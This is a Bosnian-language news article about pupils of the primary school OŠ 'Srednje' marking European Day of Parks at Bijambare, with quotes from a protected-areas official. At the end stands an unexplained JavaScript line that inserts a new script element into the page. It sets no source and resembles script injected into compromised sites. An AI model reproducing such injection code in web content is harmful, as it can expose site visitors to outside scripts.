Učenici OŠ “Srednje” obilježili Evropski dan parkova

Povodom  Evropskog dana parkova koji se u svijetu obilježava 24.maja, u prekrasnom ambijentu Nacionalnog parka Bijambare upriličena je priredba. Naime, marljivi učenici OŠ „Srednje“ predstavili su se recitalom, dramskim prikazom, nastupom horske, ritmičke i folklorne sekcije. Ovim se želi ukazati na očuvanje parkova i zelenih površina u urbanim sredinama te ljude približi prirodi. Mustafa Zvizdić, stručni saradnik za promociju i marketing Kantonalne javne ustanove za zaštićena prirodna područja,  istakao je da su učenici OŠ „Srednje“ vrlo istaknuti saradnici ove ustanove.

„Vrlo interesantan program pripremili su učenici OŠ „Srednje“ iz Srednjeg . Treba napomenuti da je projekat obilježavanje značajnih ekoloških datuma u saradnji sa osnovnim i srednjim školama ušao već u sedmu godinu. Učenici OŠ „Srednje“ naši su vrlo istaknuti saradnici koji se uvijek jave sa vrlo interesantnim programom. Kroz ovaj projekat prošlo je više od 10 000 djece. O prirodnim ljepotama Bijambara ne treba govoriti. Dovoljno je samo posjetiti i uvjeriti se. Naša ustanova se trudi da uvijek bude aktuelna sa novim sadržajima i detaljima. Već mjesec dana saobraća novi  voz sa novom i jačom lokomotivom. U skorije vrijeme proširit ćemo parking“, kazao je Zvizdić.

Evropski Dan parkova se obilježava radi promocije zaštićenih dijelova prirode širom Evrope koji je pokrenut 1999.godine od EUROPARC Federacije.

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);